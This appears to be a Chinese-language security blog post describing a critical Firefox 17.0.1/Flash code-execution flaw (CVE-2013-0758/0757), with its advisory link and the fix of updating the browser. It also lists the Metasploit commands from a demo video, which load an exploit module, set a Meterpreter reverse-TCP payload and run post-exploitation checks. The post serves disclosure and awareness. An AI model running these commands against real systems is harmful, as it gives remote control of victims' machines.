2013年5月27日 星期一

Firefox 17.0.1 + Flash 的漏洞(含影片示範)

Firefox 17.0.1 + Flash 的漏洞(含影片示範)

發佈日期:2012/11/21(由 Marius Mlynski 首次發現)、2013/5/15(發佈PoC)
影響版本:Firefox 17.0.1 (含之前所有版本)
漏洞編號:
CVE-2013-0758
CVE-2013-0757

這個漏洞會使 Firefox 17.0.1 (含之前所有版本)觸發執行遠端惡意程式,而 Flash 是拿來當作觸發 Firefox 漏洞的媒介。
在官方網站標示為『Critical』嚴重等級的漏洞。

官方網站說明:
http://www.mozilla.org/security/announce/2013/mfsa2013-15.html

解決方案:
請更新 Firefox 到最新的版本

影片內指令:
use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

參考資料來源:
http://eromang.zataz.com/2013/05/27/firefox-17-0-1-flash-privileged-code-injection-metasploit-demo/


轉載自《網路攻防戰》

沒有留言:

張貼留言